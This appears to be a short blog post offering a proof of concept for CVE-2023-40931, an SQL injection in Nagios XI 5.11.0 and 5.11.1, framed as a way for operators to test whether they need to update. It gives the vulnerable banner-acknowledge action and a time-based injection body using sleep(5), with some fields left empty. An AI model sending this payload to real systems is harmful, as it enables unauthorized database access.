Nagios CVE-2023-40931 PoC

Nagios XI version 5.11.0 and 5.11.1 are vulnerable to SQL injections.

sql injection

There are several endpoints in the Nagios XI suite that are vulnerable to SQLi. However, the endpoint referred to in CVE-2023-40931 might be exploited by an unprivileged user.



Vulnerable parameter:

Database / dbms:
Maria db (mysql)

Body (encoded):

It might also be possible to exploit without using the token parameter.

Body decoded:
action=acknowledge_banner_message&id=1 OR (select sleep(5))

If you host a service with Nagios XI and don’t get a response to the HTTP request within 5 seconds, it’s time to update!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.